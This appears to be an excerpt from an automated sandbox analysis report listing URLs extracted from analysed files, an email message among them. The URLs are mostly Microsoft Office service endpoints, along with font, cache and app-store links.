Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.aadrm.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.aadrm.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.addins.omex.office.net/api/addins/search
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.cortana.ai
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.microsoftstream.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.office.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.onedrive.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://api.scheduler.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: App1698251227486805100_2A419441-EC7B-423B-A6D1-083834C84BA5.log.0.dr, E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://augloop.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://augloop.office.com/v2
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cdn.entity.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: chromecache_162.4.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://config.edge.skype.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cortana.ai
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cortana.ai/api
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://cr.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://d.docs.live.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dev.cortana.ai
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://devnull.onenote.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://directory.services.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ecs.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://graph.windows.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://graph.windows.net/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://invites.office.com/
Source: chromecache_114.4.drString found in binary or memory: https://itunes.apple.com/us/app/messenger/id454638411
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://lifecycle.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://login.microsoftonline.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://login.windows.local
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://make.powerautomate.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://management.azure.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://management.azure.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.action.office.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://messaging.office.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ncus.contentsync.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://officeapps.live.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://onedrive.live.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office365.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office365.com/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://outlook.office365.com/connectors
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: chromecache_125.4.drString found in binary or memory: https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: chromecache_114.4.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.facebook.orca
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://powerlift.acompli.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://pushchannel.1drv.ms
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://res.cdn.office.net
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://settings.outlook.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://staging.cortana.ai
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://substrate.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://tasks.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXTERNAL DESERT FORREST NURSERY LLC.msg, ~WRS{27E7959F-871D-45D1-9A6B-99DB7BF6509A}.tmp.0.drString found in binary or memory: https://url.emailprotection.link/?b50ZOkikVGiV6ecO-M6yQX1_uIfhcwWDRCfiQW8F0sGllFQZqVZ80Fh1DftrvvFu_d
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
